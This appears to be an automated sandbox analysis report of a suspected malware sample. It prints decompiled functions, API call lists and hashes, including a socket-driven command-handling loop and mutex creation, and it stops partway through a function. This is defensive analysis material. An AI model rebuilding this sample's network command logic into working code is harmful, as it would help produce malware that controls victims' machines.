Instruction Fuzzy Hash: 0BF0F45622928186E7318F75A840766B761F758704F888226E98C87665EF3CC60DDB1D

Uniqueness

Uniqueness Score: -1.00%

Function 00C6B944, Relevance: 5.3, APIs: 4, Instructions: 268
memoryCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00C6B944(void* __edx, signed int* __rax, void* __rcx, signed int* __r8, void* __r10, void* __r11, signed char _a16, signed int* _a24, signed int _a32, signed short _a36, signed short _a38) {
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				signed int _v88;
				char _v96;
				signed int _v100;
				signed int _v104;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t74;
				int _t76;
				signed int _t121;
				signed int _t122;
				void* _t129;
				void* _t130;
				void* _t134;
				void* _t138;
				signed int _t152;
				signed int _t158;
				signed int* _t192;
				void* _t194;
				signed int* _t224;
				void* _t225;
				void* _t227;
				signed int* _t230;
				void* _t238;
				void* _t239;
				signed int* _t240;
				signed int* _t241;

				_t239 = __r11;
				_t238 = __r10;
				_t230 = __r8;
				_t194 = __rcx;
				_t192 = __rax;
				_t226 = _t227;
				_t176 = 0;
				_t225 = __rcx;
				_a24 = _t224;
				_t3 =  &(_t224[0]); // 0x1
				r8d = _t3;
				_t75 = E00C6BD0C(_t74, 0, _t193, __rcx,  &_a16, _t224, __rcx, _t227);
				if(_t75 == 0) {
					r12d = 0xff00;
					do {
						_t152 = _a16 & 0x000000ff;
						_t122 = _t152;
						if(_t152 == 0) {
							r8d = 0x14;
							_t75 = E00C6BD98(_t152, _t192, _t193, _t225, _t225, _t230,  &_a24);
							__eflags = _t75;
							if(_t75 != 0) {
								goto L29;
							} else {
								_t224 = _a24;
								_t193 =  &(_t224[1]);
								_t224[2] = _t224[2] & 0x000000ff | (_t224[2] & 0x0000ffff) << 0x00000008;
								_t224[2] = _t224[2] & 0x000000ff | (_t224[2] & 0x0000ffff) << 0x00000008;
								_t224[3] = _t224[3] & 0x000000ff | (_t224[3] & 0x0000ffff) << 0x00000008;
								asm("movups xmm0, [ebx]");
								asm("movdqu [esi+0x70], xmm0");
								E00C6C5B0( &(_t224[1]), _t225,  &_a24);
								E00C6C028(_t192,  &(_t224[1]), _t225, _t226, _t230, _t238);
								_t75 = E00C7D4E4();
							}
						} else {
							_t129 = _t122 - 2;
							if(_t129 == 0) {
								r8d = 4;
								_t75 = E00C6BD98(_t152, _t192, _t193, _t225, _t225, _t230,  &_a24);
								__eflags = _t75;
								if(_t75 != 0) {
									goto L29;
								} else {
									_t224 = _a24;
									_t75 = _t224[0] & 0x000000ff;
									_t115 = (_t224[0] & 0x0000ffff) << 0x00000008 | _t224[0] & 0x000000ff;
									r14d = ((_t224[0] & 0x0000ffff) << 0x00000008 | _t224[0] & 0x000000ff) & 0x0000ffff;
									r14d = r14d << 2;
									__eflags = r14d;
									if(r14d != 0) {
										r8d = r14d;
										_t75 = HeapAlloc(??, ??, ??);
										_t241 = _t192;
										__eflags = _t192;
										if(_t192 != 0) {
											r8d = r14d;
											_t76 = E00C6BD0C(_t75, _t176, _t193, _t225, _t192, _t224, _t225, _t226);
											__eflags = _t76;
											if(_t76 == 0) {
												E00C6C4A0(_t115 & 0x0000ffff, _t193, _t225, _t241, _t239);
											}
											_t230 = _t241;
											goto L26;
										}
									}
								}
							} else {
								_t130 = _t129 - 1;
								if(_t130 == 0) {
									r8d = 0xa;
									_t75 = E00C6BD98(_t152, _t192, _t193, _t225, _t225, _t230,  &_a24);
									__eflags = _t75;
									if(_t75 != 0) {
										goto L29;
									} else {
										_t224 = _a24;
										_v72 = _t224[0] & 0x000000ff;
										_t158 = (_t224[0] & 0x0000ffff) << 0x00000008 & 0x0000ffff | _t224[0] & 0x000000ff;
										_v88 = _t158;
										_v80 = ((_t224[1] & 0x0000ffff) << 0x00000008 & 0x0000ffff | _t224[1] & 0x000000ff) + _t158;
										r8d =  *( *((intOrPtr*)(_t225 + 0x10)) + 0x298);
										r8d = r8d - ((_t224[1] & 0x0000ffff) << 0x00000008 & 0x0000ffff | _t224[1] & 0x000000ff);
										_v76 = r8d;
										r8d = r8d - ((_t224[2] & 0x0000ffff) << 0x00000008 & 0x0000ffff | _t224[2] & 0x000000ff);
										_v84 = r8d;
										_t75 = E00C7F8C4( *((intOrPtr*)(_t225 + 0x10)),  &_v96);
									}
								} else {
									_t134 = _t130 - 1;
									if(_t134 == 0) {
										r8d = 8;
										__eflags = E00C6BD98(_t152, _t192, _t193, _t225, _t225, _t230,  &_a24);
										if(__eflags != 0) {
											goto L29;
										} else {
											_t224 = _a24;
											_v100 = _t224[0] & 0x000000ff;
											_v104 = (_t224[1] << 0x00000010 | _t224[1] & r12d) << 0x00000008 | _t224[1] >> 0x00000008 & r12d | _t224[1] & 0x000000ff;
											_t75 = E00C7F910(__eflags,  &_v104);
										}
									} else {
										_t138 = _t134 - 1;
										if(_t138 == 0) {
											r8d = 6;
											__eflags = E00C6BD98(_t152, _t192, _t193, _t225, _t225, _t230,  &_a24);
											if(__eflags != 0) {
												goto L29;
											} else {
												_t224 = _a24;
												_a32 = _t224[0] & 0x000000ff;
												_a36 = (_t224[0] & 0x0000ffff) << 0x00000008 | _t224[0] & 0x000000ff;
												_a38 = (_t224[1] & 0x0000ffff) << 0x00000008 | _t224[1] & 0x000000ff;
												_t75 = E00C7F928(__eflags,  &_a32);
											}
										} else {
											if(_t138 == 1) {
												r8d = _t194 + 7;
												if(E00C6BD98(_t152, _t192, _t193, _t225, _t225, _t230,  &_a24) != 0) {
													L29:
													_t224 = _a24;
												} else {
													_t224 = _a24;
													_t75 = _t224[1] & 0x000000ff;
													_t121 = (_t224[1] << 0x00000010 | _t224[1] & r12d) << 0x00000008 | _t224[1] >> 0x00000008 & r12d | _t224[1] & 0x000000ff;
													if(_t121 != 0) {
														r8d = _t121;
														_t230 =  &(_t230[1]);
														_t75 = HeapAlloc(??, ??, ??);
														_t240 = _t192;
														if(_t192 != 0) {
															_t10 =  &(_t192[1]); // 0x4
															r8d = _t121;
															if(E00C6BD0C(_t75, _t176, _t193, _t225, _t10, _t224, _t225, _t226) == 0) {
																 *_t240 = (_t224[1] << 0x00000010 | _t224[1] & r12d) << 0x00000008 | _t224[1] >> 0x00000008 & r12d | _t224[1] & 0x000000ff;
																E00C7F8F8(_t240);
															}
															_t230 = _t240;
															L26:
															_t75 = HeapFree();
														}
													}
												}
											}
										}
									}
								}
							}
						}
						if(_t224 != 0) {
							_t230 = _t224;
							_t75 = HeapFree(??, ??, ??);
							_t176 = 0;
							_a24 = _t224;
						}
						r8d = 1;
						_t194 = _t225;
						_t75 = E00C6BD0C(_t75, _t176, _t193, _t194,  &_a16, _t224, _t225, _t226);
					} while (_t75 == 0);
				}
				return _t75;
			}

0x00c6b944
0x00c6b944
0x00c6b944
0x00c6b944
0x00c6b944
0x00c6b94f
0x00c6b956
0x00c6b95c
0x00c6b95f
0x00c6b963
0x00c6b963
0x00c6b967
0x00c6b96e
0x00c6b974
0x00c6b97a
0x00c6b97a
0x00c6b97e
0x00c6b982
0x00c6bc49
0x00c6bc52
0x00c6bc57
0x00c6bc59
0x00000000
0x00c6bc5b
0x00c6bc5b
0x00c6bc63
0x00c6bc76
0x00c6bc89
0x00c6bc98
0x00c6bc9f
0x00c6bca2
0x00c6bca7
0x00c6bcaf
0x00c6bcbb
0x00c6bcbb
0x00c6b988
0x00c6b988
0x00c6b98b
0x00c6bbb6
0x00c6bbbf
0x00c6bbc4
0x00c6bbc6
0x00000000
0x00c6bbcc
0x00c6bbcc
0x00c6bbd4
0x00c6bbdc
0x00c6bbdf
0x00c6bbe3
0x00c6bbe7
0x00c6bbea
0x00c6bbf9
0x00c6bbfc
0x00c6bc02
0x00c6bc05
0x00c6bc08
0x00c6bc0e
0x00c6bc17
0x00c6bc1c
0x00c6bc1e
0x00c6bc29
0x00c6bc29
0x00c6bc2e
0x00000000
0x00c6bc2e
0x00c6bc08
0x00c6bbea
0x00c6b991
0x00c6b991
0x00c6b994
0x00c6bb1e
0x00c6bb27
0x00c6bb2c
0x00c6bb2e
0x00000000
0x00c6bb34
0x00c6bb34
0x00c6bb3c
0x00c6bb4e
0x00c6bb50
0x00c6bb66
0x00c6bb7c
0x00c6bb85
0x00c6bb88
0x00c6bb9d
0x00c6bba4
0x00c6bba8
0x00c6bba8
0x00c6b99a
0x00c6b99a
0x00c6b99d
0x00c6bac4
0x00c6bad2
0x00c6bad4
0x00000000
0x00c6bada
0x00c6bada
0x00c6bae2
0x00c6bb09
0x00c6bb10
0x00c6bb10
0x00c6b9a3
0x00c6b9a3
0x00c6b9a6
0x00c6ba67
0x00c6ba75
0x00c6ba77
0x00000000
0x00c6ba7d
0x00c6ba7d
0x00c6ba89
0x00c6ba9b
0x00c6baae
0x00c6bab6
0x00c6bab6
0x00c6b9ac
0x00c6b9af
0x00c6b9b5
0x00c6b9c7
0x00c6bcc2
0x00c6bcc2
0x00c6b9cd
0x00c6b9cd
0x00c6b9e6
0x00c6b9ef
0x00c6b9f1
0x00c6ba00
0x00c6ba03
0x00c6ba07
0x00c6ba0d
0x00c6ba13
0x00c6ba19
0x00c6ba1d
0x00c6ba2a
0x00c6ba4c
0x00c6ba56
0x00c6ba56
0x00c6ba5b
0x00c6bc31
0x00c6bc3a
0x00c6bc3a
0x00c6ba13
0x00c6b9f1
0x00c6b9c7
0x00c6b9af
0x00c6b9a6
0x00c6b99d
0x00c6b994
0x00c6b98b
0x00c6bcc9
0x00c6bcd2
0x00c6bcd7
0x00c6bcdd
0x00c6bcdf
0x00c6bcdf
0x00c6bce3
0x00c6bced
0x00c6bcf0
0x00c6bcf5
0x00c6b97a
0x00c6bd0b

APIs

Part of subcall function 00C6BD0C: recv.WS2_32 ref: 00C6BD3D
Part of subcall function 00C6BD0C: GetLastError.KERNEL32 ref: 00C6BD69

HeapAlloc.KERNEL32 ref: 00C6BA07
HeapAlloc.KERNEL32 ref: 00C6BBFC
HeapFree.KERNEL32 ref: 00C6BC3A

Part of subcall function 00C6BD98: HeapAlloc.KERNEL32 ref: 00C6BDCD

HeapFree.KERNEL32 ref: 00C6BCD7

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heap$Alloc$Free$ErrorLastrecv
String ID:
API String ID: 1246853186-0
Opcode ID: 523551b6a3fa3d68c2cec88709c102f579d1cea25760c4ac410292debaad2b62
Instruction ID: d2f6aa31f66efb912b23364d726d5031a6c0a0c7aa3a3ef16d5776477a9488b0
Opcode Fuzzy Hash: 523551b6a3fa3d68c2cec88709c102f579d1cea25760c4ac410292debaad2b62
Instruction Fuzzy Hash: 17A1E8623006D056E728DF7B8A902BC6BA1FB85B84B448029EFA5C7B48DF3CDA55D710

Uniqueness

Uniqueness Score: -1.00%

Function 00C644C0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00C644C0() {
				void* _t1;
				void* _t3;
				void* _t4;
				long long _t7;
				void* _t8;

				_t7 =  *0xc956e8; // 0x0
				if(_t7 == 0) {
					GetModuleHandleW();
					_t1 = E00C64B0C(_t3, _t4, _t7, _t8, _t7, "LoadLibraryA");
					if(_t7 != 0) {
						 *0xc956e8 = _t7;
						return _t1;
					}
				}
				return _t1;
			}

0x00c644c4
0x00c644ce
0x00c644d7
0x00c644e7
0x00c644ef
0x00c644f1
0x00000000
0x00c644f1
0x00c644ef
0x00c644fc

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,00C64C58,00000000,00000000,00001644,00C61769), ref: 00C644D7

Part of subcall function 00C64B0C: CreateFileA.KERNEL32 ref: 00C64B82
Part of subcall function 00C64B0C: SetFilePointer.KERNEL32 ref: 00C64B9C
Part of subcall function 00C64B0C: ReadFile.KERNEL32 ref: 00C64BC2
Part of subcall function 00C64B0C: CloseHandle.KERNEL32 ref: 00C64BE3

Strings

LoadLibraryA, xrefs: 00C644E0
KERNEL32.DLL, xrefs: 00C644D0

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$Handle$CloseCreateModulePointerRead
String ID: KERNEL32.DLL$LoadLibraryA
API String ID: 3967805679-1423781741
Opcode ID: a1222401d795af68890f1d57525c60e227cc159ad954cb063dab97f787ab7019
Instruction ID: 669f08cc683ed2767c78fa29972ef75327d6c498cecc6cf7045714911fc3882b
Opcode Fuzzy Hash: a1222401d795af68890f1d57525c60e227cc159ad954cb063dab97f787ab7019
Instruction Fuzzy Hash: C3D06724703E0091FD2A9B46FCD5B6433A06B95B41FC45625981D06760EF3CC6AAC314

Uniqueness

Uniqueness Score: -1.00%

Function 00C7BEC4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32 ref: 00C7BED6
lstrcmpiA.KERNEL32 ref: 00C7BEE8

Strings

ConsoleWindowClass, xrefs: 00C7BEDC

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ClassNamelstrcmpi
String ID: ConsoleWindowClass
API String ID: 1927859406-1331846550
Opcode ID: 8780a2ced7cf2dfca45c0d095db4ba38acd3684311b174bf1c79f7595d6cf9e2
Instruction ID: 131e9a575f66e6e7947511194fb6e4f0a0002847e6ad31215861ada104fa62c3
Opcode Fuzzy Hash: 8780a2ced7cf2dfca45c0d095db4ba38acd3684311b174bf1c79f7595d6cf9e2
Instruction Fuzzy Hash: CCD05E62350A4382FB305B24EC61BA91320B744784FC082359159879B4DE2CC60ECB04

Uniqueness

Uniqueness Score: -1.00%

Function 00C6C028, Relevance: 5.1, APIs: 4, Instructions: 72
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00C6C028(void* __rax, long long __rbx, void* __rcx, long long __rbp, void* __r8, void* __r10, char _a8, intOrPtr _a10, short _a16, short _a18, short _a20, long long _a24, long long _a32) {
				void* __rdi;
				void* __rsi;
				char _t26;
				signed int _t29;
				char _t30;
				long long _t39;
				void* _t52;
				void* _t53;
				signed char* _t54;
				void* _t63;

				_t39 = __rbx;
				_a24 = __rbx;
				_a32 = __rbp;
				_t63 = __rcx;
				_t26 = 1;
				EnterCriticalSection(??);
				r8d = 0x400;
				HeapAlloc(??, ??, ??);
				r12d = 0;
				_t52 = __rax;
				if(__rax != 0) {
					r8d = 0x100;
					if(E00C6B7AC(__rbx, __rcx, __rax, __rax, _t53, __rbp) != 0) {
						_t3 = _t39 + 5; // 0x6
						r8d = _t3;
						_a8 = 1;
						_t5 =  &_a8; // 0xff20
						_a10 = 0x10000;
						if(E00C6BE28(_t29, _t39, _t63, _t5, _t52, _t53) != 6) {
							L7:
							_t26 = r12d;
						} else {
							_t30 = r12d;
							_t7 = _t52 + 1; // 0x1
							_t54 = _t7;
							while(1) {
								_t9 =  &_a16; // 0xff28
								_a16 = _t54[1] & 0x000000ff;
								r8d = 6;
								_a18 =  *_t54 & 0x000000ff;
								_a20 =  *(_t54 - 1) & 0x000000ff;
								if(E00C6BE28(_t29, _t39, _t63, _t9, _t52, _t54) != 6) {
									goto L7;
								}
								_t30 = _t30 + _t26;
								_t54 =  &(_t54[4]);
								if(_t30 < 0x100) {
									continue;
								} else {
								}
								goto L8;
							}
							goto L7;
						}
					}
				}
				L8:
				LeaveCriticalSection();
				if(_t52 != 0) {
					HeapFree();
				}
				return _t26;
			}

0x00c6c028
0x00c6c028
0x00c6c02d
0x00c6c03e
0x00c6c041
0x00c6c04a
0x00c6c059
0x00c6c05f
0x00c6c065
0x00c6c068
0x00c6c06e
0x00c6c074
0x00c6c087
0x00c6c089
0x00c6c089
0x00c6c08d
0x00c6c091
0x00c6c096
0x00c6c0a9
0x00c6c0f4
0x00c6c0f4
0x00c6c0ab
0x00c6c0ab
0x00c6c0ae
0x00c6c0ae
0x00c6c0b2
0x00c6c0b6
0x00c6c0bb
0x00c6c0c0
0x00c6c0cc
0x00c6c0d5
0x00c6c0e2
0x00000000
0x00000000
0x00c6c0e4
0x00c6c0e6
0x00c6c0f0
0x00000000
0x00000000
0x00c6c0f2
0x00000000
0x00c6c0f0
0x00000000
0x00c6c0b2
0x00c6c0a9
0x00c6c087
0x00c6c0f7
0x00c6c0fb
0x00c6c104
0x00c6c112
0x00c6c112
0x00c6c130

APIs

EnterCriticalSection.KERNEL32 ref: 00C6C04A
HeapAlloc.KERNEL32 ref: 00C6C05F
LeaveCriticalSection.KERNEL32 ref: 00C6C0FB
HeapFree.KERNEL32 ref: 00C6C112

Part of subcall function 00C6BE28: memset.NTDLL ref: 00C6BE60
Part of subcall function 00C6BE28: memcpy.NTDLL ref: 00C6BE7D
Part of subcall function 00C6BE28: select.WS2_32 ref: 00C6BEB7
Part of subcall function 00C6BE28: send.WS2_32 ref: 00C6BED5

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalHeapSection$AllocEnterFreeLeavememcpymemsetselectsend
String ID:
API String ID: 2810826864-0
Opcode ID: 81398009a6a8f47c096948ca7e5f70cb4bdd29e231b4033ec7875d300e2762be
Instruction ID: a58a2dad779dac4334ecaf9973573744fef8d5a281e5d9003de3d04b06f59103
Opcode Fuzzy Hash: 81398009a6a8f47c096948ca7e5f70cb4bdd29e231b4033ec7875d300e2762be
Instruction Fuzzy Hash: 5521B0227087C081EB359B56A98476AA761FB88BE0F444015EFE987B19EE7DC5C6C701

Uniqueness

Uniqueness Score: -1.00%

Function 00C78064, Relevance: 5.0, APIs: 4, Instructions: 43stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,00000000,00C67600), ref: 00C78086
lstrcmpiA.KERNEL32(?,?,00000000,00C67600), ref: 00C780A3
_strnicmp.NTDLL ref: 00C780B6
lstrcpyA.KERNEL32(?,?,00000000,00C67600), ref: 00C780E2

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _strnicmplstrcmpilstrcpylstrlen
String ID:
API String ID: 871734738-0
Opcode ID: cbd71f2ff7fbcea04055ae4478abf2ca31803bbae20ce1896390994ac6bdd4e5
Instruction ID: 2deff0f11c043e054f8cc3f2160756652c2b70607f65cc673e4e00d136130997
Opcode Fuzzy Hash: cbd71f2ff7fbcea04055ae4478abf2ca31803bbae20ce1896390994ac6bdd4e5
Instruction Fuzzy Hash: 6501AD762047C186DB18EB22F68836EB326E784BC4F88C121DF5A03B15DF39D59E8704

Uniqueness

Uniqueness Score: -1.00%

Function 00C6AF40, Relevance: 5.0, APIs: 4, Instructions: 39memorystringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,?,00C6B0A4), ref: 00C6AF5C
HeapAlloc.KERNEL32(?,?,?,00C6B0A4), ref: 00C6AF79
memset.NTDLL(?,?,?,00C6B0A4), ref: 00C6AF8F
memcpy.NTDLL(?,?,?,00C6B0A4), ref: 00C6AFAC

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocHeaplstrlenmemcpymemset
String ID:
API String ID: 422472530-0
Opcode ID: a23cd05c44c0ffc1fcd5926998349e2928e21e93476a014a780ebf82783f820f
Instruction ID: 1b0ec9055f900e1313247b7a10a3cf194e7a803b2e2b7310e599b9924c4bfe0c
Opcode Fuzzy Hash: a23cd05c44c0ffc1fcd5926998349e2928e21e93476a014a780ebf82783f820f
Instruction Fuzzy Hash: 66014B66711B9085EB24DF27A440719BBA1F7C8FC4F4D8125EE495B719DE39C4418B14

Uniqueness

Uniqueness Score: -1.00%

Function 00C78800, Relevance: 5.0, APIs: 4, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00C78821
HeapFree.KERNEL32 ref: 00C78859
LeaveCriticalSection.KERNEL32 ref: 00C78872
InitializeCriticalSection.KERNEL32 ref: 00C7887F

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalSection$EnterFreeHeapInitializeLeave
String ID:
API String ID: 1934031791-0
Opcode ID: 971c002b4dae0a6c4b1a239e7c540f98f4433d411d312147f436eb1336247584
Instruction ID: 23667c960972bbf76f005d6ae7136372289f27485d4e6c89dea98ba0da676aa7
Opcode Fuzzy Hash: 971c002b4dae0a6c4b1a239e7c540f98f4433d411d312147f436eb1336247584
Instruction Fuzzy Hash: EF11DB31640F8091FB119F65E898B2877B5F798B94F948212DA5D43AA5CF38C98AC744

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: windef.exe PID: 5848 Parent PID: 7128 windef.exeCOMMON

Executed Functions

Function 069B0048, Relevance: 1.7, Strings: 1, Instructions: 427COMMON

Download Yara Rule

Strings

?, xrefs: 069B00AD

Memory Dump Source

Source File: 00000006.00000002.720648545.00000000069B0000.00000040.00000001.sdmp, Offset: 069B0000, based on PE: false

Similarity

API ID:
String ID: ?
API String ID: 0-1684325040
Opcode ID: 6f462c4f45c49333e4829bd43f885d8c231fb1b6cad3edb98e7d9d6873b31e3c
Instruction ID: 6e40326c06bf9e4ce270829823322c63d55a46dfec345033a805c433482a117d
Opcode Fuzzy Hash: 6f462c4f45c49333e4829bd43f885d8c231fb1b6cad3edb98e7d9d6873b31e3c
Instruction Fuzzy Hash: 04F1B034F00209DFDB54CBA8C981AAFB7B6BF88704F249529D5069BBA1DB74EC41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 069B0000, Relevance: 1.5, Strings: 1, Instructions: 261COMMON

Download Yara Rule

Strings

?, xrefs: 069B00AD

Memory Dump Source

Source File: 00000006.00000002.720648545.00000000069B0000.00000040.00000001.sdmp, Offset: 069B0000, based on PE: false

Similarity

API ID:
String ID: ?
API String ID: 0-1684325040
Opcode ID: 9a55ef799af059e421d689804b99dc14fdee1e6100d233178ced3b0e33c0e66e
Instruction ID: 738287a18c369923aec4eb2b2e1abcc52a8746b05d865e39c896e9de9cae5459
Opcode Fuzzy Hash: 9a55ef799af059e421d689804b99dc14fdee1e6100d233178ced3b0e33c0e66e
Instruction Fuzzy Hash: 89914270F0434A8FDB148B68C8917AEBBB6AF85304F248966D502DF6E2DBB4DC41C791

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: CVbJSUXraQ.exe PID: 4112 Parent PID: 7128 CVbJSUXraQ.exeCOMMON

Executed Functions

Function 004186C4, Relevance: 104.3, APIs: 4, Strings: 55, Instructions: 1056
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E004186C4(char __eax, void* __ebx, void* __edi, signed int __esi, void* __fp0) {
				char _v8;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				void* _v60;
				char _v64;
				char _v68;
				signed int _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v85;
				char _v86;
				char _v87;
				char _v92;
				char* _v96;
				char _v100;
				char _v104;
				char* _v108;
				void* _v112;
				char _v241;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v328;
				char _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				char _v360;
				char _v364;
				char _v368;
				char _v372;
				char _v376;
				char _v380;
				char _v384;
				char _v388;
				char _v392;
				char _v396;
				char _v400;
				char _v404;
				char _v408;
				char _v412;
				char _v416;
				char _v420;
				char _v424;
				char _v428;
				char _v432;
				char _v436;
				char _v440;
				char _v444;
				char _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				char _v460;
				char _v464;
				char _v468;
				char _v472;
				char _v476;
				char _v480;
				char _v484;
				char _v488;
				char _v492;
				char _v496;
				char _v500;
				char _v504;
				char _v508;
				char _v512;
				char _v516;
				char _v520;
				char _v524;
				char _v528;
				char _v532;
				char _v536;
				char _v540;
				char _v544;
				char _v548;
				char _v552;
				char _v556;
				char _v560;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				char _v580;
				char _v584;
				char _v588;
				char _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				intOrPtr _v616;
				char _v620;
				char _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				char _v644;
				void* _t444;
				void* _t450;
				intOrPtr* _t451;
				intOrPtr* _t616;
				intOrPtr* _t623;
				intOrPtr* _t630;
				intOrPtr* _t637;
				intOrPtr* _t651;
				intOrPtr* _t652;
				intOrPtr* _t653;
				intOrPtr* _t656;
				intOrPtr* _t657;
				intOrPtr* _t660;
				intOrPtr* _t661;
				intOrPtr* _t664;
				intOrPtr* _t672;
				void* _t678;
				intOrPtr* _t715;
				intOrPtr* _t751;
				intOrPtr* _t752;
				intOrPtr _t757;
				signed int _t807;
				intOrPtr* _t828;
				intOrPtr* _t831;
				signed int _t838;
				signed int _t885;
				intOrPtr _t902;
				int _t921;
				void* _t934;
				void* _t936;
				void* _t938;
				intOrPtr* _t945;
				intOrPtr* _t948;
				intOrPtr* _t949;
				intOrPtr* _t950;
				signed int _t963;
				signed int _t964;
				void* _t965;
				void* _t989;
				intOrPtr _t997;
				intOrPtr _t1015;
				intOrPtr* _t1088;
				void* _t1109;
				intOrPtr* _t1111;
				intOrPtr* _t1113;
				intOrPtr* _t1115;
				char** _t1118;
				void* _t1125;
				void* _t1153;
				void* _t1155;
				void* _t1156;
				intOrPtr _t1160;
				intOrPtr _t1161;
				void* _t1164;
				void* _t1191;
				void* _t1197;
				void* _t1205;
				void* _t1207;

				_t1207 = __fp0;
				_t1157 = __esi;
				_t1151 = __edi;
				_t962 = __ebx;
				_t1160 = _t1161;
				_t965 = 0x50;
				do {
					_push(0);
					_push(0);
					_t965 = _t965 - 1;
					_t1162 = _t965;
				} while (_t965 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v8 = __eax;
				E00403980(_v8);
				_push(_t1160);
				_push(0x41985e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t1161;
				E004034E4( &_v76);
				_v86 = 0;
				_v85 = 0;
				E0040357C( &_v92, 0x41987c);
				E00405668();
				E00407DE0( &_v308, _t1162);
				_push( &_v308);
				E00406CE8( &_v312, __ebx, __esi); // executed
				_pop(_t444);
				E00403798(_t444, _v312);
				_t450 = CreateMutexA(0, 0, E00403990(_v308)); // executed
				_v112 = _t450;
				_t451 =  *0x41b12c; // 0x41c6a4
				if( *((intOrPtr*)( *_t451))() == 0xb7) {
					L71:
					_pop(_t997);
					 *[fs:eax] = _t997;
					_push(E00419868);
					E004034E4( &_v644);
					E00403BF4( &_v640, 2);
					E004034E4( &_v632);
					E00403BF4( &_v628, 5);
					E00403508( &_v608, 9);
					E00403BDC( &_v572);
					E00403508( &_v568, 2);
					E00403BDC( &_v560);
					E00403508( &_v556, 2);
					E00403BDC( &_v548);
					E00403508( &_v544, 2);
					E00403BDC( &_v536);
